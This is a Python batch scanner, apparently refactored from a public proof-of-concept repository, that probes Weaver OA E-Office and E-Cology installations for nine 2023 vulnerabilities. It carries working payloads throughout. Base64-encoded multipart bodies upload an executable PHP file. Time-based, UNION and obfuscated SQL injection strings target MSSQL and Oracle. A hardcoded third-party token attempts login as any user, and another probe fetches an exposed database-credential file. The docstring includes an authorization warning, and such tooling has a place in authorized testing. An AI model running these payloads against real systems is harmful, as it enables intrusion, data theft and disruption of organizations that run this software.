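"""PoC scanner for the 2023 batch of Weaver (泛微) OA vulnerabilities.

Checks implemented (each is a public function taking the target base URL):

* Weaver E-Office file upload (CVE-2023-2523)
* Weaver E-Office file upload (CVE-2023-2648)
* Weaver E-Cology SQL injection (CVE-2023-15672 -- identifier as given
  upstream; confirm it against the vendor advisory before quoting it)
* Weaver OA E-Cology9 unauthenticated SQL injection (CNVD-2023-12632)
* Weaver OA e-cology front-end API SQL injection (WorkflowCenterTreeData.jsp)
* Weaver e-cology ofsLogin arbitrary-user login
* Weaver E-Cology /CheckServer.jsp SQL injection (QVD-2023-9849)
* Weaver E-Office UserSelect unauthenticated access
* Weaver OA E-Office mysql_config.ini database-credential disclosure

Environment: Python 3 with the ``requests`` package; everything else used
here (``sys``, ``re``, ``base64``, ``time``) is standard library.

Usage::

    -h            print the help menu
    -u URL        scan one URL, e.g. ``-u https://www.example.com/``
                  (a missing trailing "/" is added automatically)
    -f FILE       batch scan, one URL per line, e.g. ``-f targets.txt``

Screenshot:
https://github.com/kuang-zy/2023-Weaver-pocs/assets/53716757/62579ca0-8dcf-4f9e-ad05-46dd65865977

Authorization notice: several probes are intrusive. The two upload checks
write a (self-deleting) PHP file to the target, the injection checks send
live SQL payloads, and one of them deliberately stalls the database for
several seconds. Run this only against systems you are explicitly
authorized to test. A "[+]" result is an indicator, not proof -- every hit
asks for manual re-verification, and several checks key on weak signals
(a bare HTTP 200), so expect false positives.
"""

import base64
import re
import sys
import time

import requests

# Scanner-wide request settings. Weaver OA deployments are commonly fronted
# by self-signed certificates; the original script suppressed urllib3's
# warnings but only passed verify=False on one of nine requests, so the other
# eight failed with SSLError on such hosts and were reported as "timeouts".
# TLS verification is now applied uniformly; set VERIFY_TLS = True to insist
# on a valid chain.
REQUEST_TIMEOUT = 5
VERIFY_TLS = False
# Sleep requested from MSSQL by the time-based blind injection probe (seconds).
SQLI_DELAY_SECONDS = 5

if not VERIFY_TLS:
    requests.packages.urllib3.disable_warnings()

LOGO = "author: kuang-zy\nGitHub: https://github.com/kuang-zy"

# Browser-like headers reused by the two E-Office upload probes (verbatim from
# the original requests).
_UPLOAD_HEADERS = {
    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}


def _http(method, url, **kwargs):
    """Issue one HTTP request with the scanner-wide timeout and TLS defaults.

    Any ``timeout``/``verify`` passed explicitly wins; otherwise
    ``REQUEST_TIMEOUT`` and ``VERIFY_TLS`` apply, so no probe can hang
    forever (the original second-stage GETs carried no timeout at all).
    """
    kwargs.setdefault("timeout", REQUEST_TIMEOUT)
    kwargs.setdefault("verify", VERIFY_TLS)
    return requests.request(method, url, **kwargs)


def _report(name, baseurl, found):
    """Print the coloured [+]/[-] verdict line for one check."""
    if found:
        print(f"\033[1;31m[+]存在{name}!建议手动复验确认!url:{baseurl}\033[0m")
    else:
        print(f"\033[0;32m[-]不存在{name}\033[0m")


def _run_check(name, baseurl, probe):
    """Announce *name*, run *probe(baseurl)* and report its verdict.

    Returns True/False for a completed probe, or None when it could not be
    completed (network error, unexpected response shape). Errors are printed
    and swallowed on purpose so that one failing check does not abort a batch
    scan; unlike the original, a non-timeout failure is no longer reported as
    "响应超时" (timeout).
    """
    print(f"\033[0;34m正在检测{name}\033[0m")
    try:
        found = probe(baseurl)
    except requests.Timeout as e:
        print(e)
        print("测试失败,响应超时")
        return None
    except Exception as e:  # last-resort boundary: keep the batch going
        print(e)
        print(f"测试失败:{type(e).__name__}")
        return None
    _report(name, baseurl, found)
    return found


def _probe_cve_2023_2523(baseurl):
    """Upload a self-deleting PHP probe through ajax.php and fetch it back."""
    testurl = baseurl + 'E-mobile/App/Ajax/ajax.php?action=mobile_upload_save'
    # Multipart body, kept base64-encoded as in the original. It decodes to a
    # form part "upload_quwan" with filename "test.php." (trailing dot) whose
    # content is <?php print(256* 256); unlink(__FILE__);?>, plus an empty
    # "file" part. The PHP prints 65536 and deletes itself on first execution.
    data = 'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZFJWQ0dXcTRDeDNTcTZ0dApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwbG9hZF9xdXdhbiI7IGZpbGVuYW1lPSJ0ZXN0LnBocC4iCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZwoKPD9waHAgcHJpbnQoMjU2KiAyNTYpOyB1bmxpbmsoX19GSUxFX18pOz8+Ci0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWRSVkNHV3E0Q3gzU3E2dHQKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9IiIKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0KIAogCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWRSVkNHV3E0Q3gzU3E2dHQtLQ=='
    response = _http("POST", testurl, headers=_UPLOAD_HEADERS, data=base64.b64decode(data))
    if response.status_code != 200 or "test.php" not in response.text:
        return False
    ids = re.findall(r"(\d{10})", response.text)
    # The original takes the *second* 10-digit number in the upload reply as
    # the attachment directory (presumably the first is another field of that
    # reply -- not verifiable here). Keep that choice, but do not IndexError
    # when the reply has fewer matches.
    if len(ids) < 2:
        return False
    shell = _http("GET", baseurl + "attachment/" + ids[1] + "/test.php")
    return shell.status_code == 200 and "65536" in shell.text


def _probe_cve_2023_2648(baseurl):
    """Upload a self-deleting PHP probe through uploadify.php and fetch it back."""
    testurl = baseurl + 'inc/jquery/uploadify/uploadify.php'
    # Base64 multipart body from the original: one form part "Fdiledata" with
    # filename "444.php." (trailing dot) containing
    # <?php print(256* 256); unlink(__FILE__);?>.
    data = 'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZFJWQ0dXcTRDeDNTcTZ0dApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkZkaWxlZGF0YSI7IGZpbGVuYW1lPSI0NDQucGhwLiIKQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnCiAKPD9waHAgcHJpbnQoMjU2KiAyNTYpOyB1bmxpbmsoX19GSUxFX18pOz8+Ci0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWRSVkNHV3E0Q3gzU3E2dHQ='
    response = _http("POST", testurl, headers=_UPLOAD_HEADERS, data=base64.b64decode(data))
    if response.status_code != 200:
        return False
    ids = re.findall(r"(\d{10})", response.text)
    # Here the original uses the first 10-digit number; guard the empty case.
    if not ids:
        return False
    shell = _http("GET", baseurl + "attachment/" + ids[0] + "/444.php")
    return shell.status_code == 200 and "65536" in shell.text


def _probe_cve_2023_15672(baseurl):
    """Time-based blind check: ask MSSQL to WAITFOR DELAY and time the reply.

    The original compared status codes with a 5 s timeout, so a host that
    really slept 5 s raised a timeout and was reported as "test failed",
    while any host answering 200 quickly was reported as vulnerable -- the
    verdict was effectively inverted. Measure the round-trip instead and
    compare it against an unpadded baseline request to the same endpoint.
    """
    endpoint = baseurl + 'weaver/weaver.file.FileDownloadForOutDoc/'
    baseline_url = endpoint + '?fileid=123&isFromOutImg=1'
    testurl = endpoint + f"?fileid=123+WAITFOR+DELAY+'0:0:{SQLI_DELAY_SECONDS}'&isFromOutImg=1"
    headers = {
        'Accept': '*/*',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close'
    }
    # Allow comfortably more than the injected delay so a vulnerable host is
    # not mistaken for a network timeout.
    timeout = SQLI_DELAY_SECONDS + 10

    started = time.monotonic()
    _http("POST", baseline_url, headers=headers, timeout=timeout)
    baseline = time.monotonic() - started

    started = time.monotonic()
    _http("POST", testurl, headers=headers, timeout=timeout)
    delayed = time.monotonic() - started

    # Require most of the requested delay *on top of* the baseline latency, so
    # a merely slow server does not trip the check.
    return delayed - baseline >= SQLI_DELAY_SECONDS * 0.8


def _probe_cnvd_2023_12632(baseurl):
    """Error/UNION-based check against mobile/plugin/browser.jsp."""
    testurl = baseurl + 'mobile/plugin/browser.jsp'
    # The X-Forwarded-For / X-Remote-* headers are part of the original probe,
    # presumably to satisfy a source-address check on the endpoint -- left
    # as-is.
    headers = {'Upgrade-Insecure-Requests': '1',
               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
               'Accept-Encoding': 'gzip, deflate',
               'Accept-Language': 'zh-CN,zh;q=0.9',
               'x-forwarded-for': '127.0.0.1',
               'x-originating-ip': '127.0.0.1',
               'x-remote-ip': '127.0.0.1',
               'x-remote-addr': '127.0.0.1',
               'Content-Type': 'application/x-www-form-urlencoded'}
    # "keyword" is triple URL-encoded; fully decoded it reads
    #   a' union select 1,''+(SELECT @@VERSION)+'
    # hence the check for the MSSQL version banner in the response.
    data = "isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537"
    response = _http("POST", testurl, headers=headers, data=data)
    return 'Microsoft SQL Server' in response.text


# Oracle UNION payload for WorkflowCenterTreeData.jsp, copied verbatim from the
# original: a long run of %0a%0d padding precedes the injected SELECT.
_WORKFLOW_TREE_PAYLOAD = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1"


def _probe_workflow_tree_sqli(baseurl):
    """Oracle UNION injection against WorkflowCenterTreeData.jsp.

    NOTE(review): the success indicator inherited from the original is the
    substring "id" in a 200 response, which almost any HTML or JSON page
    contains. Treat a hit here as low-confidence until re-verified by hand.
    """
    testurl = baseurl + 'mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333'
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }
    response = _http("POST", testurl, headers=headers, data=_WORKFLOW_TREE_PAYLOAD)
    return response.status_code == 200 and "id" in response.text


def _probe_ofslogin(baseurl):
    """Third-party-token login via ofsLogin.jsp.

    The listing this was recovered from rendered the query string as
    ``syscode=1×tamp`` -- an HTML ``&times`` entity swallowing ``&timestamp``;
    the parameter name is restored here. NOTE(review): the indicator is a bare
    HTTP 200 after redirects, so a login page served with 200 also matches.
    """
    testurl = baseurl + 'mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1&timestamp'
    response = _http("GET", testurl)
    return response.status_code == 200


def _probe_qvd_2023_9849(baseurl):
    """CheckServer.jsp injection: the original keys on a "system error" body."""
    testurl = baseurl + 'mobile/plugin/CheckServer.jsp?type=mobileSetting'
    response = _http("GET", testurl, headers={"Connection": "close"})
    return response.status_code == 200 and "system error" in response.text


def _probe_userselect(baseurl):
    """Unauthenticated UserSelect/ -- indicator is a bare 200 (low confidence)."""
    testurl = baseurl + 'UserSelect/'
    response = _http("GET", testurl, headers={"Content-Type": "application/json"})
    return response.status_code == 200


def _probe_mysql_config(baseurl):
    """Exposed mysql_config.ini; "dataurl" is a key of that file per the original."""
    testurl = baseurl + 'mysql_config.ini'
    response = _http("GET", testurl, headers={"Content-Type": "application/json"})
    return response.status_code == 200 and "dataurl" in response.text


# ---------------------------------------------------------------------------
# Public check functions: same names and signatures as the original script.
# Each prints its progress/verdict and returns True/False/None (see _run_check).
# ---------------------------------------------------------------------------

def CVE_2023_2523(baseurl):
    """Weaver E-Office file upload (CVE-2023-2523). Intrusive: writes a file."""
    return _run_check("泛微 E-Office文件上传漏洞(CVE-2023-2523)", baseurl, _probe_cve_2023_2523)


def CVE_2023_2648(baseurl):
    """Weaver E-Office file upload (CVE-2023-2648). Intrusive: writes a file.

    The original reported this check's verdict under the CVE-2023-2523 label
    (copy-paste); the label now matches the check being run.
    """
    return _run_check("泛微 E-Office文件上传漏洞(CVE-2023-2648)", baseurl, _probe_cve_2023_2648)


def CVE_2023_15672(baseurl):
    """Weaver E-Cology time-based blind SQL injection (identifier as upstream)."""
    return _run_check("泛微E-Cology SQL注入漏洞(CVE-2023-15672)", baseurl, _probe_cve_2023_15672)


def CNVD_2023_12632(baseurl):
    """Weaver OA E-Cology9 unauthenticated SQL injection (CNVD-2023-12632)."""
    return _run_check("泛微OA E-Cology9未授权SQL注入漏洞(CNVD-2023-12632)", baseurl, _probe_cnvd_2023_12632)


def e_cology_apiSQLinj(baseurl):
    """Weaver OA e-cology front-end API SQL injection (WorkflowCenterTreeData.jsp)."""
    return _run_check("泛微OA e-cology前台接口SQL注入漏洞", baseurl, _probe_workflow_tree_sqli)


def e_cology_ofsLogin_anyusers_login(baseurl):
    """Weaver e-cology ofsLogin arbitrary-user login."""
    return _run_check("泛微 e-cology ofsLogin任意用户登录漏洞", baseurl, _probe_ofslogin)


def QVD_2023_9849(baseurl):
    """Weaver E-Cology /CheckServer.jsp SQL injection (QVD-2023-9849)."""
    return _run_check("泛微E-Cology /CheckServer.jsp路径SQL注入漏洞(QVD-2023-9849)", baseurl, _probe_qvd_2023_9849)


def UserSelect_unauthorized(baseurl):
    """Weaver E-Office UserSelect unauthenticated access."""
    return _run_check("泛微E-Office UserSelect未授权访问漏洞", baseurl, _probe_userselect)


def mysql_config_db_infoleak(baseurl):
    """Weaver OA E-Office mysql_config.ini database-credential disclosure."""
    return _run_check("泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞", baseurl, _probe_mysql_config)


# Run order is the original's.
CHECKS = (
    CVE_2023_2523,
    CVE_2023_2648,
    CVE_2023_15672,
    CNVD_2023_12632,
    e_cology_apiSQLinj,
    e_cology_ofsLogin_anyusers_login,
    QVD_2023_9849,
    UserSelect_unauthorized,
    mysql_config_db_infoleak,
)


def normalize_base_url(url):
    """Strip whitespace and guarantee one trailing "/".

    Every probe builds its URL as ``baseurl + 'relative/path'``, so a base
    without the trailing slash silently targeted the wrong path; the original
    help text asked the user to remember it instead.
    """
    baseurl = url.strip()
    if baseurl and not baseurl.endswith("/"):
        baseurl += "/"
    return baseurl


def pocs(url):
    """Run every check in CHECKS against *url* (whitespace/trailing-slash normalized)."""
    baseurl = normalize_base_url(url)
    print("\n")
    print(f"\033[1;33m测试url:{baseurl}\033[0m")
    print("\n")
    for check in CHECKS:
        check(baseurl)


def geturl_from_file(filename):
    """Return the target URLs in *filename*, one per line.

    Blank lines and lines starting with "#" are skipped, so a stray empty
    line no longer produces a scan of "" (nine guaranteed failures).
    """
    with open(filename, "r", encoding="utf-8") as f:
        return [
            line.strip()
            for line in f
            if line.strip() and not line.lstrip().startswith("#")
        ]


def _print_help():
    print("-h\t\t输出本帮助菜单")
    print("-u url\t\t单个url进行poc检测,例:-u https://www.baidu.com/ (注意:最后的\"/\"一定要加上)")
    print("-f filename\t批量检测,一行放一个url保存到txt中,例:-f targets.txt")


def main(argv):
    """Command-line entry point; *argv* is ``sys.argv`` (program name first)."""
    print(f"\033[1;36m{LOGO}\033[0m")
    print("\n")
    if len(argv) < 2:
        print("输入\"-h\"查看使用帮助")
        return
    option = argv[1]
    if option == "-h":
        _print_help()
        return
    if option in ("-u", "-f"):
        if len(argv) < 3:
            print("输入\"-h\"查看使用帮助")
            return
        if option == "-u":
            pocs(argv[2])
            return
        try:
            urls = geturl_from_file(argv[2])
        except OSError as e:
            # Distinguish "file unreadable" from a usage error; the original
            # collapsed both into the generic help hint.
            print(f"无法读取文件:{e}")
            return
        for url in urls:
            pocs(url)
        return
    print("输入\"-h\"查看使用帮助")


if __name__ == '__main__':
    main(sys.argv)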